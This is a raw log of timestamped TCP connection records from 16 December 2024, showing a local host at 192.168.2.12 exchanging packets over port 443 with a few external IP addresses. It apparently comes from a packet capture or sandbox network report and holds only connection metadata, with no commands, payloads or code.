                                                                                                                                                Dec 16, 2024 09:54:08.703438044 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:08.703454018 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:08.833486080 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:09.045331001 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.047784090 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.047805071 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.048180103 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.048815966 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.048886061 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.049099922 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.095336914 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.618484020 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:09.618530035 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.618630886 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:09.630706072 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:09.630727053 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.673345089 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.721951008 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.721976995 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.722043991 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.722074032 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.722090960 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.722134113 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.913206100 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.913237095 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.913321972 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.913335085 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.913366079 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.965836048 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.965852976 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.965893984 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.965910912 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.965924025 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.965964079 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.985327005 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.985358953 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.985416889 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:09.985428095 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:09.985493898 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.077435970 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.077451944 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.077482939 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.077523947 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.077543020 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.077572107 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.119375944 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.119405985 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.119452000 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.119468927 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.119508982 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.131844044 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131855965 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131889105 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131903887 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131916046 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131932974 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131942987 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.131954908 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.131988049 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.132019997 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.132050991 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.134218931 CET49716443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.134238005 CET44349716108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.141855001 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.141880035 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.141910076 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.141941071 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.141953945 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.141983986 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.161509037 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.161539078 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.161571026 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.161602974 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.161612988 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.161678076 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.261754990 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.261770010 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.261810064 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.261842012 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.261851072 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.261907101 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.272273064 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.272337914 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.272382975 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.272394896 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.272433996 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.286475897 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.286494017 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.286561966 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.286572933 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.286664009 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.301621914 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.301645994 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.301702023 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.301713943 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.301753044 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.316493988 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.316528082 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.316565037 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.316575050 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.316616058 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.330415010 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.330434084 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.330476999 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.330487967 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.330533981 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.345238924 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.345267057 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.345319033 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.345329046 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.345385075 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.455384016 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.455411911 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.455461979 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.455472946 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.455521107 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.465989113 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.466016054 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.466063023 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.466070890 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.466126919 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.475955963 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.475980043 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.476035118 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.476046085 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.476104975 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.485831976 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.485848904 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.485904932 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.485914946 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.485934019 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.485990047 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.494355917 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.494376898 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.494442940 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.494452000 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.494488955 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.499874115 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.499955893 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.499962091 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.499975920 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.500034094 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.509860039 CET49720443192.168.2.12108.158.75.80
                                                                                                                                                Dec 16, 2024 09:54:10.509870052 CET44349720108.158.75.80192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.925435066 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.925533056 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:10.928169966 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:10.928177118 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.928503036 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.930562973 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:10.930658102 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:10.930664062 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:10.930742025 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:10.975327015 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.299652100 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.299767971 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:11.304035902 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:11.304047108 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.304327011 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.311669111 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:11.355329037 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.598201036 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.598634958 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:11.598695993 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:11.599622011 CET49721443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:11.599636078 CET4434972120.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.258497000 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.258542061 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.258563995 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.258641958 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.258641958 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.258658886 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.258764029 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.510807991 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.510827065 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.510890007 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.510919094 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.510934114 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.510982990 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.510982990 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.692953110 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.692981958 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.693058968 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.693073034 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.693113089 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.696938992 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.696957111 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.697027922 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.697040081 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.697084904 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.697084904 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.702142954 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.702162027 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.702274084 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.702282906 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.702327013 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.830216885 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.830250025 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.830313921 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.830329895 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.830418110 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.830418110 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.882267952 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.882308960 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.882365942 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.882380962 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.882416964 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.882445097 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.926630020 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.926667929 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.926728964 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.926748991 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.926799059 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.926853895 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.972836971 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.972878933 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.972963095 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.972982883 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:12.973109007 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:12.973248005 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.003041983 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.003082037 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.003124952 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.003143072 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.003189087 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.003330946 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.035365105 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.035406113 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.035501003 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.035501003 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.035517931 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.035700083 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.064090014 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.064115047 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.064210892 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.064224958 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.064271927 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.064271927 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.087455988 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.087512970 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.087536097 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.087551117 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.087606907 CET4434972445.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:13.087613106 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:13.087652922 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:14.463061094 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:14.992685080 CET49724443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:17.799176931 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:17.799245119 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:17.799304008 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:17.880310059 CET49708443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:17.880372047 CET49708443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:17.881767988 CET49730443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:17.881813049 CET44349730173.222.162.60192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:17.881913900 CET49730443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:17.882322073 CET49730443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:17.882337093 CET44349730173.222.162.60192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:18.000021935 CET44349708173.222.162.60192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:18.000194073 CET44349708173.222.162.60192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:19.223819971 CET44349730173.222.162.60192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:19.224271059 CET49730443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:20.074120045 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                Dec 16, 2024 09:54:20.074152946 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:20.082746983 CET49730443192.168.2.12173.222.162.60
                                                                                                                                                Dec 16, 2024 09:54:29.409554958 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:29.409601927 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:29.409776926 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:29.419491053 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:29.419511080 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:31.062859058 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:31.062969923 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:31.065448999 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:31.065460920 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:31.065747976 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:31.079359055 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:31.127326965 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.030839920 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.030880928 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.030895948 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.031023026 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.031023026 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.031040907 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.031140089 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.079516888 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.079540968 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.079586029 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.079596996 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.079699993 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.246588945 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.246622086 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.246731997 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.246731997 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.246743917 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280589104 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280611992 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280636072 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280642033 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280647993 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280678034 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280706882 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.280706882 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.280746937 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.280788898 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.319945097 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.319955111 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.319974899 CET4434973345.125.67.168192.168.2.12
